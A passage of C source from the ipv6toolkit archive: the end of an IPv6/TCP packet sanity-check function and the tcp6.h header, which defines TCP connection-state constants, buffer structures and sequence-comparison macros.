*)pkt_tcp), IPPROTO_TCP) != 0){ return FALSE; } /* XXX: Should perform additional checks on the IPv6 header */ /* Sanity checks on the Source Address and the Destination Address */ if(IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_src)) || IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_dst))){ return FALSE; } if(IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_src)) || IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_dst))){ return FALSE; } return TRUE; } ipv6toolkit-1.5.1/tools/tcp6.h000066400000000000000000000045611223702747200162110ustar00rootroot00000000000000/* * Header file for the tcp6 tool * */ /* Constants used for specification of TCP connection establishment */ #define OPEN_PASSIVE 1 #define OPEN_SIMULTANEOUS 2 #define OPEN_ABORT 3 #define OPEN_ACTIVE 4 /* Constants used for specification of TCP connection termination */ #define CLOSE_ACTIVE 1 #define CLOSE_PASSIVE 2 #define CLOSE_SIMULTANEOUS 3 #define CLOSE_ABORT 4 #define CLOSE_FIN_WAIT_1 5 #define CLOSE_FIN_WAIT_2 6 #define CLOSE_LAST_ACK 7 /* Constants for TCP window operation */ #define WIN_CLOSED 1 #define WIN_MODULATE 2 #define WIN_MODULATE_CLOSED_SIZE 0 #define WIN_MODULATE_CLOSED_LEN 60 #define WIN_MODULATE_OPEN_SIZE 10 #define WIN_MODULATE_OPEN_LEN 30 #define TCP_RTO 1 /* Constants for specifying the TCP connection state */ #define TCP_CLOSED 1 #define TCP_LISTEN 2 #define TCP_SYN_SENT 3 #define TCP_SYN_RECV 4 #define TCP_ESTABLISHED 5 #define TCP_FIN_WAIT_1 6 #define TCP_FIN_WAIT_2 7 #define TCP_CLOSE_WAIT 8 #define TCP_LAST_ACK 9 #define TCP_CLOSING 10 #define TCP_TIME_WAIT 11 /* Constants for debug mode */ #define DEBUG_DUMP 1 #define DEBUG_SCRIPT 2 /* Constants for TCP buffers */ #define TCP_BUFFER_SIZE 65535 #define TCP_INPUT_BUFFER_SIZE TCP_BUFFER_SIZE #define TCP_OUTPUT_BUFFER_SIZE TCP_BUFFER_SIZE struct queue{ unsigned char data[TCP_BUFFER_SIZE]; unsigned char *in; unsigned char *out; unsigned int size; /* unsigned int data; */ unsigned int free; }; struct tcp{ struct in6_addr srcaddr; struct in6_addr dstaddr; u_int16_t srcport; u_int16_t dstport; struct queue in; u_int32_t rcv_nxt; u_int32_t rcv_nxtwnd; struct queue out; unsigned char *out_una; unsigned char *out_nxt; /* una nxt */ u_int32_t snd_una; u_int32_t snd_nxt; u_int32_t snd_nxtwnd; u_int32_t snd_seq; /* TCP seq to use for outgoing segments (for RSTs) */ u_int32_t snd_wl1; u_int32_t snd_wl2; unsigned char fin_flag; u_int32_t fin_seq; struct timeval time; unsigned int state; unsigned int open; unsigned int close; u_int8_t flags; u_int32_t ack; u_int32_t win; unsigned int fbytes; unsigned char pending_write_f; unsigned int rto; }; #define SEQ_LT(a,b) ((int)((a)-(b)) < 0) #define SEQ_LEQ(a,b) ((int)((a)-(b)) <= 0) #define SEQ_GT(a,b) ((int)((a)-(b)) > 0) #define SEQ_GEQ(a,b) ((int)((a)-(b)) >= 0) #define SEQ_EQ(a,b) ((int)((a)-(b)) == 0)